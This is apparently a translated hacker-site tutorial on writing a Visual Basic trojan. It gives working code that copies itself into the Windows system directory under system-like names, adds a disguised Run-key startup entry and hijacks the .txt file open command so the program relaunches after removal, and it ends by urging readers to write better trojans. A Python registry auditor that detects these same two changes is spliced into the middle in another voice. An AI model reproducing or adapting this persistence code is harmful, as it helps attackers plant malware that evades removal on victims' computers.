
Writing a Destructive Trojan in Visual Basic

Back in the Server project, add the following API functions to modApi:

Public Declare Function RegOpenKey Lib "advapi32.dll" Alias "RegOpenKeyA" (ByVal hKey As Long, ByVal lpSubKey As String, phkResult As Long) As Long

Public Declare Function RegSetvalueEx Lib "advapi32.dll" Alias "RegSetvalueExA" (ByVal hKey As Long, ByVal lpvalueName As String, ByVal Reserved As Long, ByVal dwType As Long, lpData As Any, ByVal cbData As Long) As Long

Public Declare Function RegCreateKey Lib "advapi32.dll" Alias "RegCreateKeyA" (ByVal hKey As Long, ByVal lpSubKey As String, phkResult As Long) As Long

Public Const REG_BINARY = 3
Public Const REG_SZ = 1
Public Const HKEY_LOCAL_MACHINE = &H80000002
Public Const HKEY_CLASSES_ROOT = &H80000000

The procedure that writes to the startup group in the registry:

Public Sub StartupGroup()

  Dim sKey As String
  Dim result As Long
  Dim hKeyID As Long
  Dim sKeyVal As String

  sKey = "Systrsy" '' Value name in the startup group; pick one that resembles a system file.
  sKeyVal = "C:/windows/system/systrsy.exe" '' Path of the trojan file; GetSystemDirectory can be used to obtain the system path.
  result = RegOpenKey(HKEY_LOCAL_MACHINE, _
    "Software/Microsoft/Windows/CurrentVersion/Run", hKeyID)
  If result = 0 Then
   result = RegSetvalueEx(hKeyID, sKey, 0&, REG_SZ, sKeyVal, Len(sKey) + 1)
  End If
End Sub

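Good, that part is done, and it was simple. But consider this: anyone who is not a complete novice will look in the registry, see the entry and delete it, and all our hard work will have been wasted. That will not do; even if they find it, they must not be able to delete it. See the following code: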

Public Sub WriteToTxt()

  Dim result As Long
  Dim hKeyID As Long
  Dim skey As String
  Dim skeyVal As String

  skey = "txtfile/shell/open/command"
  skeyVal = "C:/windows/system/txtView.exe"
  result = RegOpenKey(HKEY_CLASSES_ROOT, skeyVal, hKeyID)

  If result = 0 Then
   result = RegSetvalueEx(hKeyID, skey, 0&, REG_SZ, skeyVal, Len(skeyVal) + 1)
  End If
End Sub

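Many readers will see at once that this sets up an association with txt files, and that is exactly right. But where does C:/windows/system/txtView.exe come from, when our trojan is C:/windows/system/systrsy.exe? It is a second copy of our trojan.

Now go back to Form_Load of the Server form in the Server project and add the following code: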

Dim sCurrentPath As String, sSystemDir As String
sCurrentPath = App.Path & "/" & App.EXEName & ".exe"
sSystemDir = "C:/windows/system"
On Error Resume Next

  '' Copy the file into the system directory as Systrsy.exe
  FileCopy sCurrentPath, sSystemDir & "/Systrsy.exe"
On Error Resume Next

'' Copy the file into the system directory as txtView.exe
FileCopy sCurrentPath, sSystemDir & "/txtView.exe"

'' Invoke
Call startupGroup
Call WriteToTxt

'' Check whether the program is already running
If App.PrevInstance Then
  '' If it is already running, exit.
  End
End If
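Both registry changes described above, a Run value named after a system file and a replaced txtfile open command, are visible in `reg query` output, so they can be audited together. The following is an added example, not part of the original article: it parses such output and flags both conditions. The baseline names, the 0.8 similarity threshold and the sample text are assumptions constructed for illustration.

```python
import re
from difflib import SequenceMatcher

# Assumed baseline (not from the article); adjust to your own gold image.
KNOWN_SYSTEM_NAMES = {"systray", "svchost", "explorer", "notepad", "rundll32"}
TXT_DEFAULT_HANDLER = "notepad"
RUN_KEY = r"hkey_local_machine\software\microsoft\windows\currentversion\run"
TXT_KEY = r"hkey_classes_root\txtfile\shell\open\command"

def parse_reg_query(text):
    """Parse `reg query` output into {key_path_lowercase: {value_name: data}}."""
    keys, current = {}, None
    for line in text.splitlines():
        if line.startswith("HKEY_"):
            current = keys.setdefault(line.strip().lower(), {})
        elif current is not None and line.strip():
            parts = re.split(r"\s{4,}", line.strip(), maxsplit=2)
            if len(parts) == 3:          # name, type, data
                current[parts[0]] = parts[2]
    return keys

def exe_stem(command):
    """Lower-case file name (without .exe) of the program a command launches."""
    m = re.search(r"([^\\/\"]+?)\.exe", command, re.IGNORECASE)
    return m.group(1).lower() if m else ""

def is_lookalike(stem):
    """True if stem is near, but not equal to, a known system binary name."""
    return any(stem != n and SequenceMatcher(None, stem, n).ratio() >= 0.8
               for n in KNOWN_SYSTEM_NAMES)

def audit(text):
    """Return (finding, value_name, data) tuples for both persistence points."""
    keys, findings = parse_reg_query(text), []
    for name, data in keys.get(RUN_KEY, {}).items():
        if is_lookalike(exe_stem(data)) or is_lookalike(name.lower()):
            findings.append(("run-lookalike", name, data))
    default = keys.get(TXT_KEY, {}).get("(Default)")
    if default is not None and exe_stem(default) != TXT_DEFAULT_HANDLER:
        findings.append(("txt-handler-changed", "(Default)", default))
    return findings

# Constructed sample of `reg query` output, not captured from a real host.
SAMPLE = r"""HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
    SecurityHealth    REG_EXPAND_SZ    %windir%\system32\SecurityHealthSystray.exe
    Systrsy    REG_SZ    C:\windows\system\systrsy.exe

HKEY_CLASSES_ROOT\txtfile\shell\open\command
    (Default)    REG_SZ    C:\windows\system\txtView.exe
"""
```

Calling `audit()` on the combined output of `reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run` and `reg query HKCR\txtfile\shell\open\command` returns one tuple per finding; checking both keys in one pass matters because the second entry is what relaunches the program after the first is deleted.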

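Well, with that a destructive trojan has been born. I have tested it and it is a fairly good one. I hope everyone can also write a good trojan, one that can surpass Glacier (冰河).

Notes:

1. When handling ports, it is best to use high-numbered ports; otherwise they will conflict with some commonly used ports.

2. If you are using VB.NET for the first time, it is best to read some books on it; you might even end up writing a super trojan.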

http://www.cnxhacker.com/Article/program/hacker/200612/7383.html
